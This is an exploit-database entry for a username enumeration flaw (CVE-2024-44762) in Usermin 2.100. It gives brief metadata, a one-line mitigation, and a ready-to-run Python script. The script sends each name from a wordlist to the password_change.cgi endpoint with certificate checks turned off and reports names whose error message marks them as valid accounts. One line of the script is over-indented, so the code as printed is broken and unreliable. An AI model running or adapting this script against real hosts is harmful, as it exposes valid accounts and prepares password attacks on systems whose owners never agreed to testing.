Usermin 2.100 - Username Enumeration

vendor:

Usermin

by:

Kjesper

4.1

CVSS

MEDIUM

Username Enumeration

200

CWE

Product Name: Usermin

Affected Version From: <= 2.100

Affected Version To:

Patch Exists: NO

Related CWE: CVE-2024-44762

CPE: a:webmin:usermin:2.100

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2024

Usermin 2.100 – Username Enumeration

Usermin version 2.100 allows an attacker to enumerate valid usernames by sending requests to the password_change.cgi endpoint. By observing the responses, an attacker can identify valid usernames on the system.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the password_change.cgi endpoint and implement account lockout mechanisms to prevent username enumeration.

Source

Exploit-DB raw data:

# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024 
# Exploit Author: Kjesper 
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100 
# Tested on: Kali Linux 
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/ 

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100) 
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt 

import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

parser = argparse.ArgumentParser()

parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")

args = parser.parse_args()

if len(sys.argv) != 5:
    print("Please provide the -u for URL and -w for the wordlist containing the usernames")
    print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt") 
    exit()
    
usernameFile = open(args.wordlist_users, 'r')

dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()

for i in usernameFileIntoList:

    newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
    params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
    response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
        if "Failed to change password: The current password is incorrect." in response.text:
        print("Possible user found with username: " + i)
    
    if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
        print("Application is most likely not vulnerable and are therefore quitting.")
        exit() # comment out line 33-35 if you would still like to try username enumeration.